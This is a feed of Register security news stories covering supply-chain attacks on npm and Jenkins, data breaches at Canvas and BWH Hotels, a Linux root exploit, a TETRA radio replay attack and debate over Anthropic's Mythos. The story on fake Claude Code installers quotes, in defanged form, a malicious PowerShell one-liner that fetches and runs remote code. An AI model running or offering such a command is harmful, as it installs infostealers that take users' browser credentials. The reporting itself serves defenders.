News

US bank reports itself after slinging customer data at 'unauthorized AI app'

The Register - 7 min 16 sec ago
A US commercial bank just tattled on itself to the Securities and Exchange Commission (SEC) for plugging a bunch of customer data into an unauthorized AI application. Community Bank, which operates in southwestern Pennsylvania, Ohio, and West Virginia, filed an 8-K with the regulator on Monday, saying it launched an investigation into the internal cockup, which remains ongoing. It felt compelled to submit the filing "due to the volume and sensitive nature of the non-public information." This included customer names, dates of birth, and Social Security numbers, but the filing provided no further detail about the incident. Community Bank did not specify what this "unauthorized AI-based software application" was or how it was used. However, the disclosure of data such as SSNs, which in the US are generally categorized among the most sensitive types of data that organizations can store on behalf of customers, is protected under several federal and state laws. One possibility is that the data was entered into a generative AI tool outside the bank's approved systems. If so, that could raise questions about whether the information was transmitted to a third-party provider and how it may have been retained or processed. The Register asked Community Bank for more details and will update this story if it responds. The bank confirmed that it suffered no operational impact and customers were not prevented from accessing their accounts or payment services as a result. "The company is evaluating the customer data that was affected and is conducting notifications as required by applicable federal and state laws and regulatory guidance," Community Bank stated in its cybersecurity disclosure. "The company has been, and continues to be, in communication with relevant banking and financial regulators regarding the incident." It also promised to continue its remediation efforts, take action to prevent future failures, and gave the "we're committed to protecting customers' data" line that always goes down so well. ®
Categories: News

Cache-poisoning caper turns TanStack npm packages toxic

The Register - 2 hours 57 min ago
An attacker has published 84 malicious versions of official TanStack npm packages, with the impact including credential theft, self-propagation, and complete disk wipe of an infected host. The attack is part of a wave of attacks across npm and PyPI, continuing the Mini Shai-Hulud campaign. Supply chain security company Socket reports that other compromised packages include the OpenSearch client, Mistral AI, UiPath, and Guardrails AI. Malicious npm packages for TanStack, an open source application stack, were published between 19:20 and 19:26 UTC on May 11. The attack was detected and reported within 30 minutes by StepSecurity, triggering incident response and npm deprecation. GitHub published a security advisory at 21:30 UTC, including a list of affected packages. TanStack founder Tanner Linsley published a postmortem describing how the attacker used a malicious commit on a fork to create a pull request on the TanStack repository, causing scripts to auto-run and build the malware. This poisoned the GitHub Actions cache in what Linsley said is a variant of a known GitHub Action vulnerability discovered in 2024. The malware then extracted the npm OpenID Connect (OIDC) token, used for trusted npm publishing, from runner memory using the same code used to compromise tj-actions in an attack last year. No TanStack maintainers were compromised. StepSecurity has a detailed analysis of the attack, noting that the payload "reads files from over 100 hardcoded paths" including those that may contain cloud credentials, SSH (secure shell) keys, developer tool configuration files, crypto wallets, VPN configurations, messaging credentials, and shell history. Shell history may contain tokens and passwords pasted into the terminal. Security researcher Nicholas Carlini warned the payload "installs a dead-man's switch… as a system user service." The service checks whether a stolen GitHub token has been revoked and, if it has, runs a command to wipe the local disk completely. Socket's write-up includes recommended actions such as rotating all secrets on any affected system. GitHub's advisory suggests "any developer or CI environment that ran npm install, pnpm install, or yarn install against an affected version on 2026-05-11 should be considered compromised." The Mistral AI has also been reported on GitHub, and at the time of writing, the Mistral AI project is quarantined on PyPI. This attack is still evolving and will likely have a far-reaching impact. It confirms again that running everyday commands like npm install is unsafe, that for all their efforts major package repositories including npm and PyPI are still not secured, and that software development is now best done in isolated, ephemeral environments. ®
Categories: News

Apple, Google drag cross-platform texting into the encrypted age

The Register - 5 hours 11 min ago
Apple and Google have taken a big step toward securing cross-platform texting, ending years of messages bouncing around in glorified plaintext. Apple announced this week that encrypted Rich Communication Services (RCS) messaging is rolling out in beta for iPhone users running iOS 26.5 and Android users on the latest version of Google Messages. The feature works across supported carriers and adds end-to-end encryption to cross-platform chats that were still taking the scenic route through carrier-era messaging infrastructure. Users will know it's enabled when a lock icon appears in RCS conversations. Apple says E2EE RCS messages cannot be read while traveling between devices, bringing Android-to-iPhone chats closer to the protections offered by WhatsApp and Signal. The move lands as other platforms head in the opposite direction. Earlier this month, Meta confirmed it was backing away from parts of its encryption rollout for Instagram DMs, telling The Register that "very few" people actually used the feature and suggesting privacy-minded users head over to WhatsApp instead. Apple, meanwhile, appears content to lean harder into the privacy angle, finally plugging one of the more obvious holes in modern messaging security. That gap has been hanging around for years. While iMessage chats between Apple devices were already encrypted, conversations involving Android phones could fall back to SMS or unencrypted RCS, depending on carrier support. Google had offered encrypted RCS chats inside Google Messages for years, but only when both sides used Google's ecosystem. Apple joining the party means cross-platform RCS encryption is finally starting to span the two largest mobile ecosystems. The rollout is still marked as beta, and carrier support varies by region, so not everyone will get encrypted chats immediately. UK availability remains unclear for now, as none of the major UK networks currently appear on Apple's published compatibility lists for the feature. Still, after two decades of the mobile industry insisting that interoperability and security could not coexist, cross-platform texting may finally be catching up with the rest of modern messaging. ®
Categories: News

Japan’s PM orders cybersecurity review to stop Mythos going full CyberZilla

The Register - 9 hours 17 min ago
Japan’s prime minister Sanae Takaichi has ordered a review of government cybersecurity strategy, citing the arrival of Anthropic’s bug-hunting model Mythos as a moment that makes it necessary to order a cabinet-level project. In a Tuesday cabinet meeting, the PM instructed cybersecurity minister Hisashi Matsumoto to devise measures to check the state of government systems to determine whether it’s possible to detect and fix vulnerabilities, and to develop a plan to ensure critical infrastructure operators can do likewise. Japan’s leader ordered the checks because she feels Mythos and similar frontier models may be misused, and that attacks on infrastructure may therefore increase in speed and scale – perhaps even exponentially. Over the last couple of years cybersecurity vendors and researchers have often pointed out that AI models make it possible to find flaws and automate attacks. When Anthropic debuted Mythos in early April, the notion that AI has the potential to vastly complicate the security landscape went mainstream. Many regulators around the world have issued guidance to point out that now is the perfect time to revisit and improve security strategies and capabilities, because Mythos and other AI models mean defenses are going to be tested like never before. India’s securities regulator went a step further by ordering a security review at the organizations it oversees. And now Japan’s leader has decided the matter is of sufficient importance that her office needs to weigh in and set new policy to ensure AI doesn’t go on a destructive rampage through Japanese infrastructure. Whether Takaichi’s urgency is needed is open to debate. Some researchers have said that while Mythos can find bugs at speed, but doesn’t find flaws humans can’t detect with their naked brains. Others suggest Mythos is not vastly better at finding bugs than open source models that pre-date it and are publicly available – unlike Mythos which is restricted to certain users. Others have all but dismissed Mythos as a marketing stunt. ® .
Categories: News

Double Canvas breach acknowledged as ShinyHunters sets new pay-or-leak deadline

The Register - 15 hours 41 min ago
Ed-tech giant Instructure confirmed two rounds of unauthorized activity affecting its online learning platform Canvas within two weeks as data-theft-and-extortion crew ShinyHunters threatened to leak data it claims belongs to more than 275 million students, teachers, and staff tied to nearly 9,000 schools worldwide. In a security incident update, Instructure apologized for the disruption when Canvas went offline last Thursday, leaving thousands of colleges, universities, and K-12 schools without access to course materials, grades, and due dates during final exams and Advanced Placement testing for many. As of Saturday, the parent company claimed, “Canvas is fully back online and available for use.” And it finally broke its silence on Monday about what happened, admitting not one but two intrusions after criminals exploited a security vulnerability in its Free-for-Teacher learning system, and saying the data thieves stole information including usernames, email addresses, course names, enrollment information, and messages. “Core learning data (course content, submissions, credentials) was not compromised,” the Monday disclosure said. “We're still validating all findings, but we want to be clear about what we understand was and wasn't affected.” On April 29, the online education firm “detected unauthorized activity in Canvas,” immediately revoked the intruder’s access, and initiated a probe into the breach, according to Instructure’s notice posted on its website. On May 7, the company “identified additional unauthorized activity tied to the same incident.” ShinyHunters defaced about 330 Canvas school login portals, also exploiting the same Free-for-Teacher vulnerability, and that caused the ed-tech firm to take Canvas offline and “into maintenance mode to contain the activity.” ShinyHunters claims it stole 3.65 TB of data, including about 275 million records from about 8,800 schools including Harvard, Columbia, Rutgers, Georgetown, and Stanford universities. After moving the pay-or-leak deadline multiple times, ShinyHunters set a final deadline of end-of-day May 12 for individual institutions to contact them directly to negotiate payment - or the group will publish the full dataset. In response, Instructure said it temporarily shut down its Free-for-Teacher accounts. It also revoked privileged credentials and access tokens tied to compromised systems, rotated internal keys, restricted token creation pathways, and added monitoring across all platforms. The education platform hired CrowdStrike to assist with its forensic analysis and incident response, and said it also notified the FBI - which published its own alert on social media - and the US Cybersecurity and Infrastructure Security Agency. This is Instructure’s second breach in less than a year. ShinyHunters claimed to have breached Instructure's Salesforce environment in September 2025, and while Instructure didn’t name the crew in its latest disclosure, it did address the intrusion. “The prior Salesforce-related incident and this Canvas security incident are distinct events involving different systems and circumstances,” the company said. ®
Categories: News

Cookie thieves caught stealing dev secrets via fake Claude Code installers

The Register - Mon, 11/05/2026 - 21:21
An ongoing campaign steals developers’ secrets via fake Claude Code installers and other popular coding tools, according to Ontinue’s security researchers. The lure - as with several other infostealer attacks targeting developers over the past several months - mimics a legitimate one-line installer for an attacker-controlled command. In this case, the command is “irm https[:]//claude[.]ai/install.ps1 | iex”, and the lure replaced the destination host with “irm events[.]msft23[.]com | iex”. The payload is unique, and doesn’t match up with any documented malware family. It does, however, wreak havoc on developers exfiltrating decrypted cookies, passwords, and payment methods from Chromium-based browsers such as Google Chrome, Microsoft Edge, Brave, Vivaldi, and Opera. According to the threat hunters who documented the new campaign on Monday: “We publish for peer correlation rather than attribution.” The attacks also abuses the IElevator2 COM interface. This is Chromium’s elevation service used to handle App-Bound Encryption (ABE), specifically for encrypting and decrypting sensitive user data like cookies and passwords. Google introduced the new interface in January to protect Chromium-based browser data from cookie thieves, who used earlier ABE bypass techniques and commodity stealers that file-copied the SQLite databases holding cookies and saved passwords. However, crafty crooks (and security researchers) soon figured out workarounds to abuse IElevator2, as is the case with the newly spotted malware. The attack runs across three domains, all registered within six days of each other in April, and all fronted through Cloudflare. It relies on developers searching for “install claude code,” and selecting a sponsored result that leads to a lookalike Claude Code installation page. The page downloads and executes Anthropic’s authentic installer - but as Ontinue’s team found, the malicious instruction isn’t stored in the file itself, but instead rendered into the HTML of the landing page. “Automated scanners, URL reputation services, and any skeptical reviewer who simply curls the URL therefore observe clean PowerShell delivered from a Cloudflare-fronted domain bearing a valid Let’s Encrypt certificate,” the researchers wrote. “Victims, meanwhile, are presented with an entirely different command.” The pasted command redirects victims to an obfuscated PowerShell loader that injects a native AEB helper into a live browser process. The helper’s “exclusive purpose,” we’re told, is to invoke the browser's IElevator2 COM interface and recover the App-Bound Encryption key. The helper formats a pipe to exfiltrate sensitive data using Chromium’s legitimate Mojo naming convention for IPC pipes. It then attempts to use IElevator2 to decrypt developer secrets, but it falls back to the legacy interface on the Elevation Service alongside the legacy IElevator if the new one doesn’t work. Ontinue’s researchers published a full list of elevation-service identifiers, so be sure to check that out. And after receiving the ABE key from the helper, the PowerShell loader decrypts the local browser databases and sends the stolen data to an attacker-controlled server via an in-memory secure_prefs.zip archive. The malware hunters say that they compared the malware against published reporting for the several stealers - including Lumma, StealC, Vidar, EddieStealer, Glove Stealer, Katz Stealer, Marco Stealer, Shuyal, AuraStealer, Torg Grabber, VoidStealer, Phemedrone, Metastealer, Xenostealer, ACRStealer, DumpBrowserSecrets, DeepLoad, and Storm - and found no technical match. The closest is Glove Stealer, first documented by Gen Digital in November 2024, which also abuses IElevator via a helper module communicating over a named pipe. The orchestration model, however, differs from Glove in that it uses a “small native helper acting as a single-purpose ABE oracle, with all detection-visible activity pushed into PowerShell.” According to the research team, this split matters for defenders because "behavioral rule sets that look at the native PE in isolation will see nothing actionable,” as they wrote. “Detection has to land at the COM call and at the PowerShell layer.” ®
Categories: News

Anthropic’s bug-hunting Mythos was greatest marketing stunt ever, says cURL creator

The Register - Mon, 11/05/2026 - 17:30
cURL developer Daniel Stenberg has seen Anthropic’s Mythos, a model the AI biz has suggested is too capable at finding security holes to release publicly, scan his popular open source project. But after the system turned up just a single vulnerability, he concluded the hype around Mythos was “primarily marketing” rather than a major AI security breakthrough. Stenberg explained in a Monday blog post that he was promised access to Anthropic’s Mythos model - sort of - through the AI biz’s Project Glasswing program. Part of Glasswing involves giving high-profile open source projects access via the Linux Foundation, but while Stenberg signed up to try Mythos, he said he never actually received direct access to the model. Instead, someone else with access ran Mythos against curl’s codebase and later sent him a report. “It’s not that I would have a lot of time to explore lots of different prompts and doing deep dive adventures anyway,” Stenberg explained. “Getting the tool to generate a first proper scan and analysis would be great, whoever did it.” That scan, which analyzed curl’s git repository at a recent master-branch commit, was sent back to him earlier this month, and it found just five things that it claimed were “confirmed security vulnerabilities” in cURL. Saying he had expected an extensive list of vulnerabilities, Stenberg wrote that the report “felt like nothing,” and that feeling was further validated by a review of Mythos’ findings. “Once my curl security team fellows and I had poked on this short list for a number of hours and dug into the details, we had trimmed the list down and were left with one confirmed vulnerability,” Stenberg said, bringing us back to the aforementioned number. As for the other four, three turned out to be false positives that pointed out cURL shortcomings already noted in API documentation, while the team deemed the fourth to be just a simple bug. “The single confirmed vulnerability is going to end up a severity low CVE planned to get published in sync with our pending next curl release 8.21.0 in late June,” the cURL meister noted. “The flaw is not going to make anyone grasp for breath.” That said, Mythos did find several other non-security bugs that Stenberg said the team is working on fixing, and he notes that their description and explanation were well done. Mythos can do good work, in other words, but it’s not a ground-breaking, game-changing AI model like Anthropic has claimed. “My personal conclusion can however not end up with anything else than that the big hype around this model so far was primarily marketing,” Stenberg said in the blog post. “I see no evidence that this setup finds issues to any particular higher or more advanced degree than the other tools have done before Mythos.” cURL code is no stranger to AI To say cURL has become widely used in its nearly three decades of existence would be an understatement. Its wide reach has meant that its team has been running it through all sorts of static code analyzers and fuzz testing it since well before the dawn of the AI age. With AI’s rise, the cURL team has adapted, meaning Mythos is hardly the first AI to get its fingers on cURL’s codebase. “These tools and the analyses they have done have triggered somewhere between two and three hundred bugfixes merged in curl through-out the recent 8-10 months or so,” Stenberg said of tools like AISLE, Zeropath, and OpenAI Codex Security that’ve tested cURL code. “A bunch of the findings these AI tools reported were confirmed vulnerabilities and have been published as CVEs. Probably a dozen or more.” Stenberg’s experience with AI testing cURL, in other words, makes it a great candidate to see how effective Mythos can really be at finding more than the average AI. As Stenberg noted elsewhere in his blog post, Mythos isn’t doing anything particularly novel when it comes to security discoveries: It might be a bit better at finding things than previous models, but “it is not better to a degree that seems to make a significant dent in code analyzing,” the cURL author noted. Stenberg isn’t an AI doomer when it comes to its ability to improve software design, though. Yes, he may have closed the cURL bug bounty earlier this year due to an influx of sloppy, useless bug reports, but he also noted a few months prior to the bounty closure that some security researchers assisted by AI have made valuable reports. “AI powered code analyzers are significantly better at finding security flaws and mistakes in source code than any traditional code analyzers did in the past,” Stenberg said, adding an important qualifier for the Mythos moment: “All modern AI models are good at this now.” Mythos isn’t any more creative than its creators Both older AI models and security-focused tools like Mythos have a common limitation, as far as Stenberg is concerned: They’re only as good at finding security vulnerabilities as the humans who programmed them. “AI tools find the usual and established kind of errors we already know about. It just finds new instances of them,” Stenberg said. “We have not seen any AI so far report a vulnerability that would somehow be of a novel kind or something totally new.” As for Mythos, Stenberg remains unimpressed, calling it "an amazingly successful marketing stunt for sure" in his blog post. In an email to The Register, Stenberg admitted that it’d be possible for AI models to actually discover new, novel types of vulnerabilities, but he’s still not convinced that they can go beyond what humans are capable of finding, given that they’re limited by our understanding of how software vulnerabilities work. At the end of the day, Stenberg explained, when we talk about security, we’re only talking about code. “Source code is text and it feels like maybe we already know about most ways we can do security problems in it,” he pondered in his email. In other words, like the valuable AI-assisted reports made to the cURL bug bounty program before its closure due to a flood of AI garbage, making valuable use of systems like Mythos is going to require humans to get creative. Sorry, no foisting your critical thinking onto a bot. “Human researchers have always used tools when they look for security problems,” Stenberg told us. “Adding AIs to the mix gives the humans even more powerful tools to use, more ways to find problems. I expect that many security bugs going forward will be found by humans coming up with new ways and angles of prompting the AIs.” Stenberg said that he hopes he’ll actually get his hands on Mythos so he can experiment with its capabilities, but he doesn’t seem to be holding out hope the promised access will materialize. “I have been promised access and for all I know I will eventually get it,” Stenberg told us. “I just don't know when.” ®
Categories: News

BWH Hotels guests warned after reservation data checks out with cybercrooks

The Register - Mon, 11/05/2026 - 15:34
BWH Hotels is informing customers about a third-party data breach that gave cybercriminals access to six months' worth of data. The notification email stated that BWH Hotels, which owns the WorldHotels, Best Western Hotels & Resorts, and Sure Hotels brands, identified the intrusion on April 22, but the affected data goes back to October 14, 2025. BWH Hotels CTO Bill Ryan, who penned the notification email, said names, email addresses, telephone numbers, and/or home addresses belonging to "certain guests" were accessed by an unauthorized third party. The intruders also accessed reservation details, such as reservation numbers, dates of stay, and any special requests. It confirmed that the attack targeted one of its "web applications that houses certain guest reservation data." No payment or bank details were involved. The Register asked BWH Hotels whether the intrusion began in October and went undetected until April, or whether a later breach exposed data dating back to October. We also asked if this was related to information we were sent in March about BWH Hotel customer booking data being stolen and used for phishing campaigns. At the time, the company neither confirmed nor denied the information seen by The Register. BWH Hotels did not immediately respond to our request for comment on Monday. "Upon discovering the incident, we immediately took the application offline and revoked the unauthorized access," said Ryan. "We have engaged leading external cybersecurity experts to support our incident response efforts and to assist with the further strengthening of existing safeguards." "We advise guests to be extra vigilant when viewing any unexpected or suspicious communications about hotel stays. If you receive a suspicious communication such as an unexpected email, text, WhatsApp message, or telephone call that asks for payment, codes, logins, or 'verification,' even if they reference a BWH Hotels property or an upcoming reservation, do not engage. Navigate to sites directly rather than clicking links." ®
Categories: News

Checkmarx tackles another TeamPCP intrusion as Jenkins plugin sabotaged

The Register - Mon, 11/05/2026 - 13:11
Checkmarx’s software engineers are still working to remove a malicious version of the code security outfit's Jenkins plugin after detecting an unauthorized upload over the weekend. It updated customers on Saturday, May 9, after discovering a version of its AST Scanner, which is used for security scans in Jenkins CI pipelines, was made available via the Jenkins Marketplace. “We are aware that a modified version of the Checkmarx Jenkins AST plugin was published to the Jenkins Marketplace,” it said in a statement. “We are in the process of publishing a new version of this plug-in.” Versions published as of May 9, 2026, should not be trusted, it added, before urging all users to check they’re running the correct release (2.0.13-829.vc72453fa_1c16) published on December 17, 2025. Installed by several hundred controllers, the plugin remains available at the time of writing, and appears as the most recently available version, although pull requests actioned on Monday morning suggest this will soon be pulled down. “What makes this particularly dangerous for Jenkins users is the trust model at play,” said SOCRadar in its coverage. “The Checkmarx Jenkins plugin is a tool people install specifically to improve the security of their pipelines. “A backdoored version doesn’t just compromise one project; it rides trusted infrastructure into every build pipeline it touches, with access to source code, environment variables, tokens, and whatever secrets the runner can see.” Security engineer Adnan Khan spotted the compromise quickly over the weekend. The crew behind the early supply chain attack affecting Checkmarx in April, TeamPCP, defaced the company’s GitHub and published six packages, each with a description alluding to the Shai-Hulud wormable malware. These packages no longer appear on Checkmarx’s GitHub, but TeamPCP made multiple changes to the AST plugins page, renaming it to “Checkmarx-Fully-Hacked-by-TeamPCP-and-Their-Customers-Should-Cancel-Now,” and altering the description to claim CheckMarx failed to rotate its secrets. The latest infiltration of Checkmarx’s internals marks the third time TeamPCP has compromised the company’s packages in as many months. As previously seen in The Register, the crooks successfully targeted Checkmarx’s AST plugin for GitHub Actions and its KICS static analysis tool back in March, deploying credential-stealing malware. SOCRadar said the latest TeamPCP compromise of the Jenkins plugin suggests that either TeamPCP was telling the truth about Checkmarx’s secrets rotation, or its members took advantage of an additional persistence mechanism that the security vendor failed to notice during its response to the March intrusion. ®
Categories: News

Taiwan's train cyber-trauma reveals a global system that’s coming off the tracks

The Register - Mon, 11/05/2026 - 09:30
OPINION There are three little words to make the heart beat faster in anyone who knows what they mean: critical infrastructure resilience. If you run that infrastructure or a country dependent on it, you need energy, communication and transport to be impregnable to cyber attacks. This is doubly so if that country is five minutes by incoming missile from an implacable hyper-competent enemy sworn to invade you. One that is building and equipping its military as fast as it can with this one thing in mind. One with the most invasive and brazen state hacking machinery on the planet. Thus it was a very bad day indeed when Taiwan’s entire bullet train system was disabled for nearly an hour by an unknown attacker. It got even worse when that attacker turned out not to be the implacable and hyper-resourced state actor over the Taiwan Strait, but a university student with a yen for radio and some kit he bought online. On the one hand, it’s good to see the good repair of the grand tradition of young hackers causing havoc from their bedrooms. On the other, WTRF? The information released by the Taiwanese authorities is scant on details, but enough to be pretty sure what actually happened. It’s bad news not just for Taiwan but for more than 100 countries that also use the TETRA two-way radio standard involved, often for emergency services. In many cases, it was the default replacement for unencrypted FM two-way radios, adding encryption, flexibility and network security. These were state of the art when TETRA was developed in the 1980s and 1990s — and work as well in 2026 as you might expect. Oops. There have been upgrades and, especially after the 2023 vulnerability disclosures, an accelerated program of making things better. A lot of the installed base globally is old, lacks over-the-air updates for security, and in any case spending money on new radios is normally at the bottom of the list for any state or public service organizations. Things have to get really bad first. Perhaps they just have. (North America is the only region where TETRA is uncommon, as it isn’t approved for public service use. This was either acute foresight or the fact that the TE in TETRA, now officially TErrestrial, used to stand for Trans-Europe. The American system, P.25, has never, however, been renamed Freedom Frequencies. Now on with the show) The network vulnerabilities are one side of the story. Our doughty hacker is the other. Reportedly, he didn’t have any TETRA hardware, but a laptop connected to a radio and an ‘SDR filter’. The latter makes little sense, it is far more likely that he had a software defined radio (SDR) called a HackRF. There are plenty of other devices that could have been used, but the HackRF is the weapon of choice for the gung-ho radio nut. SDR is a technique that has completely changed the rules of how to radio. All radios before it had to be entirely or mostly analog, with precision hardware dedicated to whatever job each radio had to do. This hardware could also be looked at as an analog computer, as it can be modelled as a set of mathematical transformations on the received signal. Analog computers have their place, just not in the 21st century. SDR is radio as digital computer. At heart, it has three components: an analog to digital converter to turn the incoming signal to a stream of numbers, very fast processing to do the radio math, and a digital to analogue converter to play the results. What you get is triply terrific. Digital processing is perfect, analog processing adds noise and distortion. Nothing is fixed, everything can be re-engineered with new code. And it can be hog-whimperingly cheap. HackRF is all those things and more. It can be configured as a portable touch-screen device. It transmits and receives from DC to daylight. You can pick one up for less than the price of a mid-range mobile. It is open source. It works with all manner of SDR creation tools, utilities and radio packages. There are infinite legitimate uses. Most excitingly, you can download apps for it that do everything, most especially the kind of thing that will introduce you with surprisingly rapidity to a wide range of new friends with no sense of humor and love letters that look suspiciously like arrest warrants. Think of it as speed dating but with more guns and less no thank yous, GPS spoofing, aviation and marine location transponders, satellite comms, data eavesdropping and injection - take your pick. You’ll need it to unlock the cell door. It is the data detection and injection that seems to have been the downfall of all concerned. A handset had its transmission decoded, and the result was retransmitted into the system as if it were that original radio. Whether the decoded data already had the General Alarm set, or whether the data had to be modified before retransmission, is not yet known. Doesn’t matter. It’s called a replay attack, and it has and is mostly used in stand-alone devices called code grabbers to unlock and steal expensive cars with wireless keys. Some countries, including Canada and the UK, have banned code grabbers, but this has failed on two counts. Code grabbers are small gadgets that can be bought online from China, and good luck policing that. Also, thieves are notably indifferent to laws. That notwithstanding, the UK is thinking of extending the ban to other classes of naughty wireless, and would doubtless like to do the same with HackRF, at least as of last week. Of course, they can’t be banned. SDRs can’t be banned as a class, especially open source ones made out of standard chips and open code. They are general purpose computers, albeit with specialisms. It doesn’t matter if you’re dismayed or delighted that things like HackRF exist, that genie is out of the bottle. What is truly dismaying is that replay attacks are a solved problem, trivially so. Choose a big keyspace, randomize and never repeat keys. That one is on lazy car makers and, apparently, the world of TETRA. Fixing that class of lazy, outdated security vulnerability will be very expensive. Embedded systems are like that, especially old ones. Not fixing this will be a gamble with infinite downside, in a world where electronic warfare systems that used to cost hundreds of millions now pour out of Ali Express for a few bucks. HackRF is to Tetra like Crocodile Dundee’s knife is to the mugger’s. Critical infrastructure resilience. Just three little words, but if you say them you better mean it. And it won’t be cheap. ®
Categories: News

Worm rubs out competitor's malware, then takes control

The Register - Fri, 08/05/2026 - 18:26
There’s a mysterious framework worming its way through exposed cloud instances removing all traces of TeamPCP infections, but it’s not benevolent by a long shot: Whoever is behind this bit of malware may be cleaning up who came before, but only so they can take their place. Discovered by security outfit SentinelOne’s SentinelLabs researchers and dubbed PCPJack for its habit of stealing previously compromised systems from TeamPCP, the worm was first spotted in late April hiding among a Kubernetes-focused VirusTotal hunting rule. It stood out from known cloud hacktools, said SentinelLabs, because the first action it always takes is to eliminate tools associated with TeamPCP attacks. The script didn’t stop there, though. “We initially considered that this toolset could be a researcher removing TeamPCP’s infections,” SentielLabs said. “Analysis of the later-stage payloads indicates otherwise.” “Analyzing this script led us to discover a full framework dedicated to cloud credential harvesting and propagating onto other systems, both internal and external to the victim’s environment,” SentinelLabs continued. In other words, this thing will harvest credentials from everywhere it can get its hands on, and then find new, unsecured cloud environment targets to spread itself to. TeamPCP came onto the scene late last year, and since then has made a name for itself primarily by undertaking a successful compromise of the Trivy vulnerability scanner. That act spread credential-harvesting malware which attackers then used to pivot to more valuable targets, and became one of the most notable supply chain attacks in recent memory. Unlike TeamPCP’s campaign, which relied on the spread of compromised software by human actors, this one spreads on its own accord. Infections start when already-infected systems look for exposed services, including Docker, Kubernetes, Redis, MongoDB, and RayML, as well as exposed web applications. Once it finds a vulnerable environment, it runs a shell script on the target system that sets up an environment to download additional payloads and searches for TeamPCP processes and artifacts to kill. That part of the infection downloads the worm itself, along with modules to enable lateral movement, parse credentials and encrypt them for exfiltration, and for scanning the web for new environments to infect. From there, the worm goes to work with the second module in its kit that conducts the actual credential thefts. This portion of the infection targets environment variables, config files, SSH keys, Docker secrets, Kubernetes tokens, and credentials from a list of finance, enterprise, messaging, and cloud service targets so long that we recommend taking a look at it here, or just assuming whatever you’re using is probably being targeted. SentinelLabs noted that the lack of a cryptominer in the malware package is unusual, and said the particular services it targeted suggests its goal is either conduct its own spam campaigns and financial fraud with the stolen data, or to make the data it harvests available to those planning similar crimes. The worm's practice of removing TeamPCP files could be opportunistic, or could mean there’s drama going on in the cybercrime world. “We have no evidence to suggest whether this toolset represents someone associated with the group or familiar with their activities,” SentinelLabs noted. “However, the first toolset’s focus on disabling and replacing TeamPCP’s services implies a direct focus on the threat actor’s activities rather than pure cloud attack opportunism.” Because this is a worm relying on unsecured cloud and web app instances ripe for targeting, mitigation recommendations are pretty simple: Keep your cloud platforms secure, and ensure authentication is required even for instances of things like Docker and Kubernetes that aren’t exposed to the internet. ®
Categories: News

'Dirty Frag' Linux flaw one-ups CopyFail with no patches and public root exploit

The Register - Fri, 08/05/2026 - 14:36
A fresh Linux privilege escalation bug dubbed "Dirty Frag" has dropped into the wild with no patches, no CVE, and a public exploit that hands attackers root access across major distributions. Security researcher Hyunwoo Kim disclosed the local privilege escalation flaw on Friday after what he said was a broken embargo forced the issue into the open. Kim described Dirty Frag as a "universal LPE" affecting "all major distributions" and warned that it delivers the same kind of immediate root access as the recent CopyFail mess – only this time, defenders do not even have patches to throw at the problem. "As with the previous Copy Fail vulnerability, Dirty Frag likewise allows immediate root privilege escalation on all major distributions," Kim said. "Because the responsible disclosure schedule and embargo have been broken, no patches exist for any distribution." Dirty Frag works by chaining together two separate Linux kernel flaws. One sits in the xfrm-ESP subsystem and dates back to a January 2017 kernel commit, according to Kim, while the second vulnerability affects RxRPC functionality introduced in 2023. Together, the two bugs allegedly let unprivileged local users overwrite protected files in memory and claw their way to root. A long list of distributions in the firing line, according to Kim, including Ubuntu, Red Hat Enterprise Linux, CentOS Stream, Fedora, AlmaLinux, and openSUSE Tumbleweed. Separately, researchers appear to have independently reverse-engineered part of the bug chain from a publicly visible kernel fix commit before the embargo expired, adding to the disclosure mess already surrounding the flaw. One GitHub project titled "Copy Fail 2: Electric Boogaloo" claims to weaponize the ESP/xfrm side of the issue separately from Kim's full Dirty Frag chain. Kim said maintainers signed off on the disclosure of the flaw after somebody else dumped exploit details online first, collapsing the embargo before patches were finished. So now the exploit is public, the fixes are not, and Linux admins get another long week. The disclosure comes as the industry is still dealing with the fallout from CopyFail, another Linux privilege escalation bug that recently landed in CISA's Known Exploited Vulnerabilities catalog after attackers started cashing in on it in the wild. But Dirty Frag makes the recent CopyFail chaos look relatively organized. There's still no CVE, no coordinated patch rollout, and not much in the way of mitigation. Kim published a temporary workaround that disables affected ESP and RxRPC modules before clearing the system page cache. Useful, perhaps, although "turn bits of the kernel off and hope for the best" is not usually the sort of guidance admins enjoy seeing. ®
Categories: News

Meta U-turns on encryption push for Instagram as DMs go plaintext

The Register - Fri, 08/05/2026 - 13:42
Meta has quietly pulled the plug on encrypted Instagram DMs, meaning private messages on one of the world’s biggest social networks are no longer especially private. The change took effect today, according to a revised Meta post first published in 2022. In a statement to The Register, Meta said the feature saw limited adoption and pointed users toward WhatsApp instead. "Very few people were opting in to end-to-end encrypted messaging in DMs, so we're removing this option from Instagram in the coming months," the spokesperson said. "Anyone who wants to keep messaging with end-to-end encryption can easily do that on WhatsApp." It’s quite the reversal for a corporation that spent years telling everyone that encryption was the future of online communications, even as governments pushed back against the company’s wider rollout plans. Much of that pressure centered on child protection. Campaigners and agencies, including the NSPCC UK’s National Crime Agency, argued wider encryption would make it harder to detect grooming, child abuse material, and other criminal activity taking place over private messaging services. Privacy advocates, however, say Meta has just blown a hole in one of the few genuinely private corners of the platform. The Center for Democracy & Technology said it had urged Meta to reverse the decision, alongside members of the Global Encryption Coalition Steering Committee. “Without default encryption, millions of Instagram users are left exposed to surveillance, interception, and misuse of their private communications,” the group said. “These risks fall hardest on people who rely on secure messaging for their safety, including journalists, human rights defenders, and survivors of abuse.” Swiss privacy outfit Proton also questioned what exactly happens to existing chats once encryption disappears. Because properly implemented E2EE prevents platforms from reading message contents, the company noted that Meta has not clarified whether previously encrypted conversations will remain inaccessible, get deleted, or become readable. “For Instagram, dropping E2EE is just an example of how little regard Meta has for the privacy and safety of its community,” Proton said in a blog post. Meta has become increasingly aggressive about monetizing and analyzing user interactions. Last year, the company confirmed that interactions with Meta AI tools, including those inside private conversations, could be used for ad targeting. The company has not publicly said whether ordinary Instagram messages could eventually feed into similar systems now that encryption is gone. ®
Categories: News

Hackers ate my homework: Educational SaaS Canvas down after cyberattack

The Register - Fri, 08/05/2026 - 11:59
